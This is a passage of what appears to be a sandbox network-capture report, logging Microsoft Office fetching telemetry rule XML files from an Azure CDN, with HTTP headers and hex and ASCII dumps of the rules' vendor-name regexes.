                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041146Z-174c587ffdfb74xqhC1TEBhabc00000003vg00000000g4y3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        62192.168.2.74977013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:46 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                        x-ms-request-id: a7625850-801e-007b-654c-3ce7ab000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041146Z-15b8b599d88pxmdghC1TEBux9c000000042g000000005wu7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        63192.168.2.74977113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:46 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                        x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041146Z-174c587ffdfb74xqhC1TEBhabc00000003zg000000003um4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:46 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        64192.168.2.74977213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:46 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                        x-ms-request-id: b855c3e2-e01e-0051-540f-3e84b2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041146Z-178bfbc474bv7whqhC1NYC1fg400000005bg00000000hafh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:46 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        65192.168.2.74977413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:48 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                        x-ms-request-id: c2cadd2f-601e-0001-2bab-3bfaeb000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041148Z-15b8b599d88vp97chC1TEB5pzw00000003tg00000000gymp
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:48 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        66192.168.2.74977513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:48 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                        x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041148Z-15b8b599d88l2dpthC1TEBmzr000000003wg0000000083bh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:48 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        67192.168.2.74977613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:48 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                        x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041148Z-174c587ffdfx984chC1TEB676g00000003tg00000000rb0v
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        68192.168.2.74977313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:48 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                        x-ms-request-id: 9434b372-401e-002a-4f0b-3dc62e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041148Z-178bfbc474bv7whqhC1NYC1fg400000005gg000000003k19
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:48 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        69192.168.2.74977713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:48 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                        x-ms-request-id: 2151d667-701e-0021-3e0f-3d3d45000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041149Z-178bfbc474bfw4gbhC1NYCunf400000005ag00000000n8x0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:49 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        70192.168.2.74977813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:50 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:50 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                        x-ms-request-id: f224b857-001e-00ad-6c03-3e554b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041150Z-178bfbc474b7cbwqhC1NYC8z4n00000005f000000000061d
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:51 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        71192.168.2.74978113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:50 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:51 UTC470INHTTP/1.1 200 OK
